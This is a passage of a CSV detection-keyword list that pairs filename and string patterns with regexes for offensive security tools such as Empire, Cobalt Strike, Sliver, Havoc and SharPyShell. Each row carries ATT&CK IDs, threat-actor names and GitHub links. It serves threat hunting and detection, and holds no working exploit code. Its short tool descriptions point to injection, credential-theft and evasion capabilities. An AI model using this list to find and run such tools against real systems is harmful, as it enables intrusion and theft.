TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*injected into LSASS*",".{0,1000}injected\sinto\sLSASS.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Injected! Check your listener!*",".{0,1000}Injected!\sCheck\syour\slistener!.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*InjectedCredentials.csv*",".{0,1000}InjectedCredentials\.csv.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*injectEtwBypass*",".{0,1000}injectEtwBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","271","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" "*inject-etw-bypass*",".{0,1000}inject\-etw\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*injectify*",".{0,1000}injectify.{0,1000}","offensive_tool_keyword","injectify","Perform advanced MiTM attacks on websites with ease.","T1557.001 - T1190 - T1071.001 - T1056.001","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/samdenty/injectify","1","0","N/A","N/A","7","658","118","2024-03-25T09:04:38Z","2017-11-06T17:01:50Z" "*Injecting converted DLL shellcode into remote process*",".{0,1000}Injecting\sconverted\sDLL\sshellcode\sinto\sremote\sprocess.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*Injecting Reflective DLL into remote process*",".{0,1000}Injecting\sReflective\sDLL\sinto\sremote\sprocess.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*Injecting shellcode into PID: *",".{0,1000}Injecting\sshellcode\sinto\sPID\:\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Injecting shellcode into the running PowerShell process*",".{0,1000}Injecting\sshellcode\sinto\sthe\srunning\sPowerShell\sprocess.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Injection done! Check your listener!*",".{0,1000}Injection\sdone!\sCheck\syour\slistener!.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*Injection* -ProcName lsass*",".{0,1000}Injection.{0,1000}\s\-ProcName\slsass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Injection\Spawn32*",".{0,1000}Injection\\Spawn32.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Injection\Spawn64*",".{0,1000}Injection\\Spawn64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Injection-Exploit-1.0-SNAPSHOT-all.jar*",".{0,1000}Injection\-Exploit\-1\.0\-SNAPSHOT\-all\.jar.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2471","712","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" "*Injections/Traversal.txt*",".{0,1000}Injections\/Traversal\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*Injections/XSS.txt*",".{0,1000}Injections\/XSS\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*InjectLibraryClient.exe -*",".{0,1000}InjectLibraryClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*InjectLibraryDrv_x64.sys*",".{0,1000}InjectLibraryDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*Inject-LocalShellcode*",".{0,1000}Inject\-LocalShellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*InjectMate.py*",".{0,1000}InjectMate\.py.{0,1000}","offensive_tool_keyword","burpsuite","Multi-tabbed extension that helps generate payloads for various purposes (XSS. SQLi. Header injection. and more).","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*InjectMateCommunity.py*",".{0,1000}InjectMateCommunity\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*Injector.exe*",".{0,1000}Injector\.exe.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","243","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" "*injector.ps1*.kirbi*",".{0,1000}injector\.ps1.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*InjectPERemote.cs*",".{0,1000}InjectPERemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectPEWMIFSRemote*",".{0,1000}InjectPEWMIFSRemote.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectProc*",".{0,1000}InjectProc.{0,1000}","offensive_tool_keyword","InjectProc","Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors.There are several techniques. which are commonly used: DLL injection. process replacement (a.k.a process hollowing). hook injection and APC injection.","T1055 - T1055.012 - T1055.001 - T1055.003","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secrary/InjectProc","1","0","N/A","N/A","10","989","210","2019-02-10T11:05:15Z","2017-05-26T08:08:20Z" "*injectremote.boo*",".{0,1000}injectremote\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Inject-RemoteShellcode*",".{0,1000}Inject\-RemoteShellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*inject-shellcode *",".{0,1000}inject\-shellcode\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*injectShellcode*",".{0,1000}injectShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*InjectShellcode*",".{0,1000}InjectShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*InjectShellCode.cs*",".{0,1000}InjectShellCode\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectShellCodeRemote.cs*",".{0,1000}InjectShellCodeRemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectShellCodeWMIFSB64*",".{0,1000}InjectShellCodeWMIFSB64.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*injectsu.dll*",".{0,1000}injectsu\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*InjectTicket*ptt /ticket:*",".{0,1000}InjectTicket.{0,1000}ptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*inline_assembly -Assembly *",".{0,1000}inline_assembly\s\-Assembly\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*inlineAssembly*/execmethod*",".{0,1000}inlineAssembly.{0,1000}\/execmethod.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*inlineDll*/dll*",".{0,1000}inlineDll.{0,1000}\/dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*inline-exec.py*",".{0,1000}inline\-exec\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*inline-execute *",".{0,1000}inline\-execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 